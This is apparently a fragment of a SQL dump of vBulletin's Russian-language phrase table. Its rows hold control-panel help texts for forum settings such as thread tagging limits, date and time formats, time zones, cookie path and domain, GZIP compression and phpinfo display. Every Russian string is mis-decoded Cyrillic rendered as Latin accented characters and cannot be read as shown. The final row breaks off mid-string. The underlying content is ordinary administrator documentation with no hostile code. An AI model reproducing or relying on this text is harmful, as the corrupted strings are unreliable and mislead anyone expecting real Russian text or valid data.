(23052, -1, 'options_options_enable_inlinemod_auth_text', 'cphelptext', 'Åñëè \"Äà \", òî ïåðåä èñïîëüçîâà Ãèåì áûñòðîé ìîäåðà öèè ïîëüçîâà òåëÿ áóäóò çà ïðà øèâà òü ïà ðîëü äëÿ ïîäòâåðæäåÃèÿ ïîëÃîìî÷èé. Âðåìÿ äåéñòâèÿ ïà ðîëÿ áóäåò îñÃîâûâà òüñÿ Ãà ïà ðà ìåòðå òà éìà óòà ïà Ãåëè à äìèÃèñòðà òîðà , ëèáî áóäåò óñòà Ãîâëåà ñðîê â îäèà ÷à ñ, åñëè òà éìà óò ïà Ãåëè à äìèÃèñòðà òîðà âûêëþ÷åÃ.', 'vbulletin', 'zCarot', 1198245973, '3.7.0 Beta 4'),
(23053, -1, 'options_options_enable_inlinemod_auth_title', 'cphelptext', 'Çà ïðà øèâà òü ïîäòâåðæäåÃèå ïîëÃîìî÷èé ïðè èñïîëüçîâà Ãèè áûñòðîé ìîäåðà öèè', 'vbulletin', 'zCarot', 1198245973, '3.7.0 Beta 4'),
(23054, -1, 'options_options_markinglimit_text', 'cphelptext', ' \"áà çå äà ÃÃûõ ïîìåòîê î ïðî÷òåÃèè\" Ãà õîäÿòñÿ ïîìåòêè î ÃÃ¥ ïðî÷òåÃèè òåì è ðà çäåëîâ âÃóòðè îäÃîé ñåññèè. Åñëè ïîëüçîâà òåëü ÃÃ¥ ïðî÷èòà ë òåìó, òî îÃà ïîìå÷à åòñÿ Ãåïðî÷èòà ÃÃîé, ïîñëå ýòîãî, åñëè ïîëüçîâà òåëü ÃÃ¥ çà éä¸ò - îÃà îñòà Ãåòñÿ Ãåïðî÷èòà ÃÃîé. \r\n\r\nÃòà îïöèÿ ïîçâîëÿåò âà ì ïîìåòèòü òåìû ïðî÷èòà ÃÃûìè ïîñëå ïðîõîæäåÃèÿ Ãåñêîëüêèõ äÃåé. Ãòî äîëæÃî áûòü òà êîå êîëè÷åñòâî äÃåé, ÷òî ïîñëå èñòå÷åÃèÿ êîòîðûõ, ïîëüçîâà òåëü, âåðîÿòÃåå âñåãî, ÃÃ¥ çà èÃòåðåñóåòñÿ å¸ ïðî÷èòà òü, ïîýòîìó è ÃÃ¥ ÃóæÃî ñîîáùà òü, ÷òî â Ãåé åñòü Ãîâûå ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(23055, -1, 'options_options_markinglimit_title', 'cphelptext', 'ÂðåìåÃÃîé ïðåäåë â áà çå äà ÃÃûõ äëÿ ïîìåòêè î ïðî÷òåÃèè ', 'vbulletin', '', 0, ''),
(23056, -1, 'options_options_threadtagging_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ïîëüçîâà òåëè ñìîãóò äîáà âëÿòü ñâîè êëþ÷åâûå ñëîâà (ìåòêè) ê òåìà ì. Âû ìîæåòå óçÃà òü áîëüøå èÃôîðìà öèè î ìåòêà õ â à Ããëîÿçû÷Ãîé ÷à ñòè Wikipedia . \r\n \r\nÄà ÃÃà ÿ îïöèÿ ÿâëÿåòñÿ ãëîáà ëüÃûì âûêëþ÷à òåëåì ñèñòåìû ìåòîê. Âû ìîæåòå êîÃòðîëèðîâà òü ðà çÃîîáðà çÃûå ïðà âà äëÿ óêà çà Ãèÿ ìåòîê ê òåìà ì Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1191253203, '3.7.0 Beta 1'),
(23057, -1, 'options_options_threadtagging_title', 'cphelptext', 'Ãà çðåøèòü ìåòêè òåì', 'vbulletin', 'zCarot', 1191253203, '3.7.0 Beta 1'),
(23058, -1, 'options_options_yestoday_text', 'cphelptext', 'Ó âà ñ åñòü 3 âà ðèà Ãòà äëÿ îòîáðà æåÃèÿ äà òû Ãà âà øåì ôîðóìå. \r\n\r\nÃîðìà ëüÃî - óñòà Ãîâèò îïöèè \"Ôîðìà ò äà òû è ôîðìà ò âðåìåÃè\", ÷òîáû ïîêà çûâà òü ïîëÃîå âðåìÿ è äà òó. \r\n\r\nÂ÷åðà /ñåãîäÃÿ - äëÿ äà ò, ïîäõîäÿùèõ â ýòè 2 ïðîìåæóòêà , áóäóò îòîáðà æà òüñÿ ñîîòâåòñòâóþùèå ñëîâà , â ïðîòèâÃîì ñëó÷à å áóäåò ïîêà çûâà òüñÿ ïîëÃà ÿ äà òà è âðåìÿ. \r\n\r\nÄåòà ëüÃî - îòîáðà æåÃèå \"äðóæåñòâåÃÃûõ\" âðåì¸Ã, êà ê, Ãà ïðèìåð, \"1 ìèÃóòó Ãà çà ä\", \"2 ÷à ñà Ãà çà ä\" èëè \"3 Ãåäåëè Ãà çà ä\".', 'vbulletin', '', 0, ''),
(23059, -1, 'options_options_yestoday_title', 'cphelptext', 'Îïöèè ôîðìà òà îòîáðà æåÃèÿ äà òû', 'vbulletin', '', 0, ''),
(23060, -1, 'options_options_tagmaxlen_text', 'cphelptext', 'Ìà êñèìà ëüÃîå ÷èñëî áà éò â Ãà çâà Ãèè ìåòêè.  áîëüøèÃñòâå ñëó÷à åâ ýòî ÷èñëî ñîâïà äà åò ñ ÷èñëîì ñèìâîëîâ â Ãà çâà Ãèè ìåòêè. \r\n \r\nÈìÿ ìåòêè ìîæåò ñîäåðæà òü ëþáûå ñèìâîëû, êðîìå çà ïÿòîé.  èìåÃà õ ìåòîê Ãåëüçÿ èñïîëüçîâà òü ñëîâà , ïîäâåðæåÃÃûå öåÃçóðå Ãà âà øåì ôîðóìå.', 'vbulletin', 'zCarot', 1191253407, '3.7.0 Beta 1'),
(23061, -1, 'options_options_tagmaxlen_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà ìåòêè', 'vbulletin', 'zCarot', 1191253407, '3.7.0 Beta 1'),
(23062, -1, 'options_options_tagmaxstarter_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ìåòîê, êîòîðûå ìîæåò ïðèñâîèòü òåìå å¸ à âòîð. Êà êîå áû çäåñü Ãè áûëî êîëè÷åñòâî, äà ÃÃûé ïà ðà ìåòð ÃÃ¥ ìîæåò áûòü âûøå, ÷åì ïà ðà ìåòð \"Êîëè÷åñòâî ìåòîê Ãà îäÃó òåìó\".\r\n\r\nÓêà æèòå \"0\" äëÿ ñÃÿòèÿ îãðà Ãè÷åÃèÿ. ×òîáû çà ïðåòèòü ïîëüçîâà òåëþ ïðèñâà èâà Ãèå ìåòîê òåìà ì èñïîëüçóéòå Ãà ñòðîéêè ïðà â ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1207560690, '3.7.0 Release Candidate 3'),
(23063, -1, 'options_options_tagmaxstarter_title', 'cphelptext', 'Êîëè÷åñòâî ìåòîê îò à âòîðà òåìû', 'vbulletin', 'zCarot', 1199282055, '3.7.0 Beta 4'),
(23064, -1, 'options_options_tagmaxthread_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ìåòîê îäÃîé òåìû. Ãèêòî ÃÃ¥ ñìîæåò äîáà âèòü åù¸ ìåòîê ê îäÃîé òåìå, åñëè äîñòèãÃóòî äà ÃÃîå çÃà ÷åÃèå.\r\n\r\nÓêà æèòå \"0\" äëÿ ñÃÿòèÿ îãðà Ãè÷åÃèÿ.', 'vbulletin', 'zCarot', 1199281999, '3.7.0 Beta 4'),
(23065, -1, 'options_options_tagmaxthread_title', 'cphelptext', 'Êîëè÷åñòâî ìåòîê Ãà îäÃó òåìó', 'vbulletin', 'zCarot', 1199281999, '3.7.0 Beta 4'),
(23066, -1, 'options_options_tagmaxuser_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ìåòîê, êîòîðûå ìîæåò ïðèñâîèòü òåìå ïîëüçîâà òåëü, ÃÃ¥ ÿâëÿþùèéñÿ à âòîðîì òåìû. Êà êîå áû çäåñü Ãè áûëî êîëè÷åñòâî, äà ÃÃûé ïà ðà ìåòð ÃÃ¥ ìîæåò áûòü âûøå, ÷åì ïà ðà ìåòð \"Êîëè÷åñòâî ìåòîê Ãà îäÃó òåìó\".\r\n\r\nÓêà æèòå \"0\" äëÿ ñÃÿòèÿ îãðà Ãè÷åÃèÿ. ×òîáû çà ïðåòèòü ïîëüçîâà òåëþ ïðèñâà èâà Ãèå ìåòîê òåìà ì èñïîëüçóéòå Ãà ñòðîéêè ïðà â ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1199282098, '3.7.0 Beta 4'),
(23067, -1, 'options_options_tagmaxuser_title', 'cphelptext', 'Êîëè÷åñòâî ìåòîê îò äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1199282098, '3.7.0 Beta 4'),
(23068, -1, 'options_options_tagforcelower_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå äà ÃÃóþ îïöèþ, òî â Ãà çâà Ãèÿõ ìåòîê ñèìâîëû îò \"A\" äî \"Z\" áóäóò çà ìåÃÃ¥Ãû ñèìâîëà ìè îò \"a\" äî \"z\" (ïåðåâåäåÃû â ÃèæÃèé ðåãèñòð). Äðóãèå ñèìâîëû ÃÃ¥ áóäóò çà òðîÃóòû.', 'vbulletin', 'zCarot', 1199282125, '3.7.0 Beta 4'),
(23069, -1, 'options_options_tagforcelower_title', 'cphelptext', 'ÈçìåÃÿòü ðåãèñòð ìåòîê', 'vbulletin', 'zCarot', 1199282125, '3.7.0 Beta 4'),
(23070, -1, 'options_options_timeoffset_text', 'cphelptext', 'Ãòî âðåìåÃÃà ÿ çîÃà ïî óìîë÷à Ãèþ äëÿ ãîñòåé è Ãîâûõ ó÷à ñòÃèêîâ âà øåãî ôîðóìà . Ãà ïðèìåð, åñëè áîëüøèÃñòâî âà øèõ ïîñåòèòåëåé èç Ìîñêâû è ÖåÃòðà ëüÃîãî ðåãèîÃà , òî óñòà Ãîâèòå ýòî Ãà \"Ìîñêâà , Ñà Ãêò-Ãåòåðáóðã, Âîëãîãðà ä\". \r\n\r\nÃîìÃèòå, ÷òî ôîðóì ïîëó÷à åò äà ÃÃûå î âðåìåÃÃîé çîÃÃ¥ ñåðâåðà èç PHP. Åñëè âû ïîæåëà åòå èçìåÃèòü âðåìåÃÃóþ çîÃó ñåðâåðà , òî âà ì ñëåäóåò èçìåÃèòü Ãà ñòðîéêè ñåðâåðà . Äëÿ ýòîãî âà ì ñëåäóåò îáðà òèòüñÿ ê õîñòåðó.', 'vbulletin', '', 0, ''),
(23071, -1, 'options_options_timeoffset_title', 'cphelptext', '×à ñîâîé ïîÿñ ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23072, -1, 'options_options_dstonoff_text', 'cphelptext', 'Åñëè âðåìåÃÃà ÿ çîÃà Ãà òåêóùèé ìîìåÃò óñòà ÃîâëåÃà â ðåæèìå ëåòÃåãî âðåìåÃè, óñòà Ãîâèòå îïöèþ â \"Äà \". ÃîìÃèòå, ÷òî ýòà îïöèÿ âëèÿåò òîëüêî Ãà ÃÎÑÒÅÉ è Ãåà âòîðèçîâà ÃÃûõ Ãà ôîðóìå ïîëüçîâà òåëåé. Çà ðåãèñòðèðîâà ÃÃûå è à âòîðèçîâà ÃÃûå ïîëüçîâà òåëè èìåþò âîçìîæÃîñòü óïðà âëÿòü ñâîåé âðåìåÃÃîé çîÃîé è ëåòÃèì/çèìÃèì âðåìåÃåì ñà ìîñòîÿòåëüÃî èç ñâîåé êîÃòðîëüÃîé ïà Ãåëè.', 'vbulletin', '', 0, ''),
(23073, -1, 'options_options_dstonoff_title', 'cphelptext', 'Âêëþ÷èòü ñèñòåìó êîððåêöèè âðåìåÃè (DST - ëåòÃ./çèì.)', 'vbulletin', '', 0, ''),
(23074, -1, 'options_options_dateformat_text', 'cphelptext', 'Åñëè âû èñïîëüçóéòå óñòà Ãîâêó \"Ãîðìà ëüÃûé\" èëè \"Â÷åðà /ñåãîäÃÿ\" äëÿ îòîáðà æåÃèÿ äà ò, ââåäèòå ôîðìà ò, â êîòîðîì æåëà åòå èõ îòîáðà æà òü. Ôîðìà òû, ïðèìåÃèìûå â PHP, ìîæÃî ïîñìîòðåòü çäåñü . \r\nÃåñêîëüêî ïðèìåðîâ: \r\nm-d-y îòîáðà çèò 04-25-98 (ôîðìà ò ÑØÀ-ìèÃè) \r\nF jS, Y îòîáðà çèò Àïðåëü 25îå, 1998 (ôîðìà ò ÑØÀ-ïîëÃûé) \r\nd-m-Y îòîáðà çèò 25-04-98 (ôîðìà ò Åâðî-ìèÃè) \r\njS F Y îòîáðà çèò 25îå Àïðåëÿ 1998 (ôîðìà ò Åâðî-ïîëÃûé)', 'vbulletin', '', 0, ''),
(23075, -1, 'options_options_dateformat_title', 'cphelptext', 'Ôîðìà ò äà òû', 'vbulletin', '', 0, ''),
(23076, -1, 'options_options_timeformat_text', 'cphelptext', 'Ãòî ôîðìà ò âðåìåÃè, â êîòîðîì áóäåò îòîáðà æà òüñÿ âðåìÿ Ãà âñåõ ñòðà Ãèöà õ ôîðóìà . Ãòî èñïîëüçóåò îïöèîÃà ëüÃûå ôóÃêöèè ôîðìà òèðîâà Ãèÿ äà òû PHP. \r\n\r\nÃåñêîëüêî ïðèìåðîâ: \r\nh:i A ïðåâðà òèòñÿ â 11:15 PM \r\nH:i ïðåâðà òèòñÿ â 23:15', 'vbulletin', '', 0, ''),
(23077, -1, 'options_options_timeformat_title', 'cphelptext', 'Ôîðìà ò âðåìåÃè', 'vbulletin', '', 0, ''),
(23078, -1, 'options_options_registereddateformat_text', 'cphelptext', 'Äà òà ðåãèñòðà öèè ïîëüçîâà òåëåé îáû÷Ãî îòîáðà æà åòñÿ âìåñòå ñ èõ ñîîáùåÃèÿìè. Ãòîò ïà ðà ìåòð îïðåäåëÿåò ôîðìà ò ýòîé äà òû ñ ïîìîùüþ îïöèîÃà ëüÃûõ ôóÃêöèé ôîðìà òèðîâà Ãèÿ äà òû PHP. (Îáû÷Ãî âà ì òðåáóåòñÿ îòîáðà æà òü òîëüêî äåÃü, ìåñÿö è ãîä; ëèáî ïðîñòî ìåñÿö è ãîä.)', 'vbulletin', '', 0, ''),
(23079, -1, 'options_options_registereddateformat_title', 'cphelptext', 'Ôîðìà ò äà òû ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(23080, -1, 'options_options_calformat1_text', 'cphelptext', 'Êîãäà ïîëüçîâà òåëü ââîäèò ñâîé äåÃü ðîæäåÃèÿ ñ óêà çà Ãèåì ãîäà , ýòà äà òà îòîáðà æà åòñÿ â åãî ïðîôèëå. Ãòî ôîðìà ò äà òû, â êîòîðîì áóäåò îòîáðà æà òüñÿ äåÃü, ìåñÿö è ãîä ðîæäåÃèÿ ïîëüçîâà òåëÿ. Çäåñü ìîæÃî ïîñìîòðåòü äîñòóïÃûå ôîðìà òû äà òû Ãà PHP. ÃÃ¥ ââîäèòå ôîðìà ò âðåìåÃè, òîëüêî ôîðìà ò äà òû!', 'vbulletin', '', 0, ''),
(23081, -1, 'options_options_calformat1_title', 'cphelptext', 'Ôîðìà ò äà òû ðîæäåÃèÿ ñ óêà çà Ãèåì ãîäà ', 'vbulletin', '', 0, ''),
(23082, -1, 'options_options_calformat2_text', 'cphelptext', 'Êîãäà ïîëüçîâà òåëü ââîäèò ñâîé äåÃü ðîæäåÃèÿ, ýòà äà òà îòîáðà æà åòñÿ â åãî ïðîôèëå. Ãòî ôîðìà ò äà òû, â êîòîðîì áóäåò îòîáðà æà òüñÿ äåÃü è ìåñÿö ðîæäåÃèÿ ïîëüçîâà òåëÿ (áåç ãîäà ). Çäåñü ìîæÃî ïîñìîòðåòü äîñòóïÃûå ôîðìà òû äà òû Ãà PHP. ÃÃ¥ ââîäèòå Ãè ôîðìà òà âðåìåÃè, Ãè ôîðìà òà îòîáðà æåÃèÿ ãîäà .', 'vbulletin', '', 0, ''),
(23083, -1, 'options_options_calformat2_title', 'cphelptext', 'Ôîðìà ò äà òû ðîæäåÃèÿ áåç óêà çà Ãèÿ ãîäà ', 'vbulletin', '', 0, ''),
(23084, -1, 'options_options_logdateformat_text', 'cphelptext', 'ÎïðåäåëåÃèå ôîðìà òà âðåìåÃè, îòîáðà æà åìîãî â çà ïèñÿõ äåéñòâèé êîÃòðîëüÃîé ïà Ãåëè. Ãóäóò èñïîëüçîâà Ãû ïà ðà ìåòðû âðåìåÃè, îïèñà ÃÃûå çäåñü .', 'vbulletin', '', 0, ''),
(23085, -1, 'options_options_logdateformat_title', 'cphelptext', 'Ôîðìà ò äà òû â çà ïèñÿõ äåéñòâèé', 'vbulletin', '', 0, ''),
(23086, -1, 'options_options_cookietimeout_text', 'cphelptext', 'Åñëè ïîëüçîâà òåëü áóäåò Ãåà êòèâÃûì â òå÷åÃèè ýòîãî êîëè÷åñòâà ñåêóÃä, òî åãî ñåññèÿ ôîðóìà èñòå÷¸ò. \r\n\r\nÅñëè âû èñïîëüçóåòå \"ÎñÃîâà ÃÃóþ Ãà Ãåà êòèâÃîñòè\" ïîìåòêó î ïðî÷òåÃèè (ñì. ÎñÃîâÃûå Ãà ñòðîéêè ), òî èñòå÷¸ÃÃà ÿ ñåññèÿ òà êæå áóäåò îáîçÃà ÷à òü, ÷òî âñå Ãåïðî÷èòà ÃÃûå ñîîáùåÃèÿ áóäóò îòìå÷åÃû ïðî÷èòà ÃÃûìè. \r\n\r\n ëþáîì ñëó÷à å, ïðè èñòå÷åÃèè ñåññèè ïîëüçîâà òåëü áóäåò óäà ë¸à èç ñïèñêà \"Òåêóùèå à êòèâÃûå ó÷à ñòÃèêè\".', 'vbulletin', 'zCarot', 1231681195, '3.8.0'),
(23087, -1, 'options_options_cookietimeout_title', 'cphelptext', 'Òà éìà óò ñåññèè ôîðóìà ', 'vbulletin', 'zCarot', 1149029171, '3.6.0 Beta 1'),
(23088, -1, 'options_options_cookiepath_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò âîçìîæÃûå ïóòè äëÿ âà øèõ cookies ôîðóìà . Åñëè ìÃîæåñòâî cookies âçà èìîäåéñòâóþò Ãà âà øåì ñà éòå, òî âîçìîæÃî áóäåò ëó÷øå îòäåëèòü cookies ôîðóìà . \r\n\r\nÅñëè âû æåëà åòå, ÷òîáû âà øè cookie ôîðóìà ðà áîòà ëè â ëþáîé äèðåêòîðèè âà øåãî ñà éòà , òî èñïîëüçóéòå \"/\" â êà ÷åñòâå ïóòè (áåç êà âû÷åê). Ãòî áóäåò îçÃà ÷à òü, ÷òî cookie ôîðóìà áóäóò ðà áîòà òü \"vashsajt.com/forum\", \"vashsajt.com/contact\", è â äðóãèõ äèðåêòîðèÿõ. Âà ì ñëåäóåò ââåñòè ýòî, åñëè ó âà ñ åñòü âÃåøÃèå ñêðèïòû, âçà èìîäåéñòâóþùèå ñ ôîðóìîì, êà ê Ãà ïðèìåð ïîðòà ëû è äðóãèå ñòðà Ãèöû. \r\n\r\nÅñëè âû æåëà åòå, ÷òîáû âà øè cookie ôîðóìà ðà áîòà ëè òîëüêî â îäÃîé äèðåêòîðèè âà øåãî ñà éòà (äèðåêòîðèè âà øåãî ôîðóìà ), òî èñïîëüçóéòå \"/forum/\" (âñòà âüòå Ãà çâà Ãèå äèðåêòîðèè ôîðóìà âìåñòî forum). Ãóòü âñåãäà äîëæåà Ãà ÷èÃà òüñÿ è çà êà Ã÷èâà òüñÿ Ãà \"/\".', 'vbulletin', '', 0, ''),
(23089, -1, 'options_options_cookiepath_title', 'cphelptext', 'Ãóòü äëÿ ñîõðà ÃÃ¥Ãèÿ cookies', 'vbulletin', '', 0, ''),
(23090, -1, 'options_options_cookiedomain_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð êîÃòðîëèðóåò âîçìîæÃûå äîìåÃû äëÿ âà øèõ cookies. Åñëè ìÃîæåñòâî cookies âçà èìîäåéñòâóþò Ãà âà øåì ñà éòå, òî âîçìîæÃî áóäåò ëó÷øå îòäåëèòü cookies ôîðóìà . \r\n\r\nÃà ïðèìåð, ïðîïóñêà ÿ ýòîò ïóÃêò âû ðà çðåøà åòå cookies ôîðóìà îïåðèðîâà òü ñ ëþáûì äîìåÃîì âà øåãî ñà éòà . Åñëè Ãà âà øåì ñà éòå Ãà õîäèòñÿ ìÃîæåñòâî äîìåÃîâ, òî cookie ôîðóìà ìîãóò áûòü çà ïèñà Ãû Ãà ëþáîì èç ýòèõ äîìåÃîâ, â çà âèñèìîñòè îò òîãî, êà êîé áóäåò èñïîëüçîâà à äëÿ âõîäà Ãà ôîðóì. \r\n\r\nÂû ìîæåòå èñïîëüçîâà òü çÃà ÷åÃèå \".example.com\" (áåç êà âû÷åê, è èñïîëüçóÿ ñâî¸ èìÿ äîìåÃà ), ÷òîáû ðà çðåøèòü âà øèì cookies ôîðóìà îïåðèðîâà òü Ãà âñåõ ïîääîìåÃà õ è Ãà ñà ìîì óêà çà ÃÃîì äîìåÃÃ¥. \r\n\r\nÂû ìîæåòå èñïîëüçîâà òü çÃà ÷åÃèå \"poddomen.example.com\" (áåç êà âû÷åê, è èñïîëüçóÿ ñâî¸ èìÿ äîìåÃà è ëþáîãî ïîääîìåÃà ) ÷òîáû ðà çðåøèòü âà øèì cookies ôîðóìà îïåðèðîâà òü Ãà óêà çà ÃÃîì ïîääîìåÃÃ¥ óêà çà ÃÃîãî äîìåÃà .', 'vbulletin', '', 0, ''),
(23091, -1, 'options_options_cookiedomain_title', 'cphelptext', 'Äîìåà cookies', 'vbulletin', '', 0, ''),
(23092, -1, 'options_options_gzipoutput_text', 'cphelptext', 'Åñëè ó âà ñ PHP óñòà Ãîâëåà âìåñòå ñ áèáëèîòåêîé ZLIB, òî âû ìîæåòå âêëþ÷èòü ýòó îïöèþ äëÿ ñæà òèÿ èñõîäÿùèõ ñòðà Ãèö è óìåÃüøåÃèÿ òðà ôèêà . \r\n\r\nÃðà óçåð ïîëüçîâà òåëÿ äîëæåà ïîääåðæèâà òü GZIP. Åñëè îáîçðåâà òåëü ÃÃ¥ ïîääåðæèâà åò åãî, òî áóäåò ïåðåäà Ãà ñòðà Ãèöà áåç ñæà òèÿ. \r\n\r\nÅñëè âû èñïîëüçóåòå Ãà âà øåì ñåðâåðå mod_gzip, òî èñõîäÿùèå ñòðà Ãèöû óæå ñæèìà þòñÿ è Ãåò Ãåîáõîäèìîñòè âêëþ÷à òü ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23093, -1, 'options_options_gzipoutput_title', 'cphelptext', 'Âûâîä â ôîðìà òå GZIP HTML', 'vbulletin', '', 0, ''),
(23094, -1, 'options_options_gziplevel_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð âëèÿåò Ãà ñòåïåÃü ñæà òèÿ GZIP äëÿ îòïðà âëÿåìûõ ñòðà Ãèö. Ãîëüøåå ÷èñëî îçÃà ÷à åò áîëüøåå ñæà òèå è âîçðà ñòà Ãèå âðåìåÃè îáðà áîòêè çà ïðîñà . \r\n\r\nÄîïóñòèìûå çÃà ÷åÃèÿ îò 0 (áåç ñæà òèÿ) äî 9 (ìà êñèìà ëüÃîå ñæà òèå). ÃîëüøèÃñòâî ëþäåé èñïîëüçóþò 1 óðîâåÃü ñæà òèÿ, òà ê êà ê ýòî ïîçâîëÿåò ïîëó÷èòü õîðîøåå ñæà òèå è âûñîêóþ ñêîðîñòü îáðà áîòêè ñåðâåðîì. Ãîëüøèå çÃà ÷åÃèÿ óâåëè÷èâà þò âðåìÿ îòäà ÷è.', 'vbulletin', '', 0, ''),
(23095, -1, 'options_options_gziplevel_title', 'cphelptext', 'ÑòåïåÃü ñæà òèÿ GZIP', 'vbulletin', '', 0, ''),
(23096, -1, 'options_options_addheaders_text', 'cphelptext', 'Ãåêîòîðûå ñåðâåðû IIS òðåáóþò âêëþ÷åÃèÿ ýòîé îïöèè; äëÿ áîëüøèÃñòâà âåá-ñåðâåðîâ ýòà ôóÃêöèÿ ÃÃ¥ áóäåò êîððåêòÃî ðà áîòà òü. Åñëè îïöèÿ âêëþ÷åÃà , äâèæîê ôîðóìà îòïðà âëÿåò çà ãîëîâêè HTTP 200 OK.', 'vbulletin', '', 0, ''),
(23097, -1, 'options_options_addheaders_title', 'cphelptext', 'Äîáà âëÿòü ñòà Ãäà ðòÃûå HTTP çà ãîëîâêè', 'vbulletin', '', 0, ''),
(23098, -1, 'options_options_nocacheheaders_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî Ãà êà æäóþ ñòðà Ãèöó áóäóò äîáà âëåà â HTTP çà ãîëîâêè ïà ðà ìåòð \"No-Cache\", ÷òî ïðèâåäåò ê îòìåÃÃ¥ êýøèðîâà Ãèÿ ñòðà Ãèö. Ãòî óâåëè÷èâà åò ðà çìåðû äà ÃÃûõ äëÿ ñòðà Ãèö, çà ïðà øèâà åìîå êà æäûé ðà ç ïðè ïîëó÷åÃèè ñòðà Ãèöû ïîëüçîâà òåëÿìè, ÷òî óâåëè÷èâà åò òðà ôèê; à òà êæå ýòî ìîæåò ïðèâåñòè ê óâåëè÷åÃèþ çà ãðóçêè ñåðâåðà ïðè áîëüøîì êîëè÷åñòâå îáñëóæèâà åìûõ ñòðà Ãèö.', 'vbulletin', 'zCarot', 1205942012, '3.7.0 Release Candidate 1'),
(23099, -1, 'options_options_nocacheheaders_title', 'cphelptext', 'Äîáà âëÿòü â HTTP çà ãîëîâêè \"No-Cache\"', 'vbulletin', '', 0, ''),
(23100, -1, 'options_options_useheaderredirect_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ñòðà Ãèöà ïåðåÃà ïðà âëåÃèÿ ÃÃ¥ áóäåò îòîáðà æà òüñÿ ïîñëå ñîîáùåÃèÿ, ïîèñêà è ò.ä.. ÃŽÃè óâåäîìëÿþò ïîëüçîâà òåëÿ, ÷òî ÷òî-òî ïðîèñõîäèò, Ãî ïðè ýòîì óâåëè÷èâà þò òðà ôèê è ìîãóò ñèëüÃî óâåëè÷èòü Ãà ãðóçêó Ãà ñåðâåð, åñëè îáñëóæèâà åòñÿ ìÃîãî ñòðà Ãèö. \r\n\r\nÃåêîòîðûå ñòðà Ãèöû âñ¸ ðà âÃî áóäóò îòîáðà æà òü ñòðà Ãèöó ñ ïåðåÃà ïðà âëåÃèåì, ÷òîáû èçáåæà òü ïðîáëåì ñ êóêà ìè. ÃŽÃè ÃÃ¥ çà âèñÿò îò ýòîé îïöèè.', 'vbulletin', '', 0, ''),
(23101, -1, 'options_options_useheaderredirect_title', 'cphelptext', 'Óäà ëèòü ñòðà Ãèöû ñîîáùåÃèé î ïåðåÃà ïðà âëåÃèè', 'vbulletin', '', 0, ''),
(23102, -1, 'options_options_allowphpinfo_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, êà æäûé ñìîæåò ïðîñìîòðåòü âà øó ñòðà Ãè÷êó phpinfo(), äîáà âèâ ê à äðåñó ôîðóìà &do=phpinfo. Ñëóæáà òåõ. ïîääåðæêè ôîðóìà ìîæåò ïîïðîñèòü âà ñ âðåìåÃÃî âêëþ÷èòü ýòó îïöèþ äëÿ ïîìîùè â äèà ãÃîñòèêå ïðîáëåì, åñëè âà ì ïîòðåáóåòñÿ òà êà ÿ ïîìîùü.  îñòà ëüÃûõ ñëó÷à ÿõ ìû ðåêîìåÃäóåì âûêëþ÷èòü å¸.', 'vbulletin', 'zCarot', 1161596884, '3.6.3'),
(23103, -1, 'options_options_allowphpinfo_title', 'cphelptext', 'Ãà çðåøèòü ïóáëè÷Ãîå îòîáðà æåÃèå phpinfo()', 'vbulletin', '', 0, ''),
(23104, -1, 'options_options_cachemaxage_text', 'cphelptext', 'ÑîîáùåÃèÿ îáû÷Ãî õðà Ãÿòñÿ ñ BB êîäà ìè, ñìà éëà ìè è ò.ä. â òîé æå ñà ìîé ôîðìå, â êà êîé áûëè Ãà ïèñà Ãû ïîëüçîâà òåëÿìè (÷òîáû áûëà âîçìîæÃîñòü ïîçæå åãî îòðåäà êòèðîâà òü), òåêñò ñîîáùåÃèÿ âñòà âëÿåòñÿ â HTML êîä ÃåïîñðåäñòâåÃÃî ïåðåä îòîáðà æåÃèåì. Ãðè êýøèðîâà Ãèè ñîîáùåÃèé, òåêñò âñòà âëÿåòñÿ â HTML êîä ïðè ðà çìåùåÃèè ñîîáùåÃèÿ (ÃÃ¥ ïåðåä îòîáðà æåÃèåì) è õðà Ãèòñÿ îòäåëüÃî â âèäå ãîòîâîãî ê îòîáðà æåÃèþ êîäà .  ðåçóëüòà òå, ñîîáùåÃèÿ îòîáðà æà þòñÿ áûñòðåå, ò.ê. Ãåò Ãåîáõîäèìîñòè êà æäûé ðà ç ïåðåä îòîáðà æåÃèåì îáðà áà òûâà òü è âñòà âëÿòü èõ òåêñò. \r\nÃòà îïöèÿ îïðåäåëÿåò, êà ê äîëãî õðà Ãÿòñÿ ñîîáùåÃèÿ. Ãîêà ñîîáùåÃèÿ êýøèðîâà Ãû, îÃè çà Ãèìà þò â 2 ðà çà áîëüøå ìåñòà , ò.ê. ôà êòè÷åñêè õðà Ãÿòñÿ â äâóõ ìåñòà õ. Åñëè ó âà ñ çà ãðóæåÃÃûé ôîðóì è òåìû îáû÷Ãî ÃÃ¥ ñóùåñòâóþò î÷åÃü äîëãî, âà ì ñëåäóåò óñòà Ãîâèòü çÃà ÷åÃèå ïîìåÃüøå (ìåÃüøå 10 äÃåé). Åñëè ó âà ñ ÃÃ¥ î÷åÃü áîëüøîé ôîðóì è òåìû îáû÷Ãî ñóùåñòâóþò äîëãî, òî ëó÷øå âñåãî ïîñòà âèòü çÃà ÷åÃèå îò 20 äî 30 äÃåé. Åñëè ó âà ñ áîëüøîå äèñêîâîå ïðîñòðà Ãñòâî, òî ìîæÃî ïîñòà âèòü áîëåå âûñîêîå çÃà 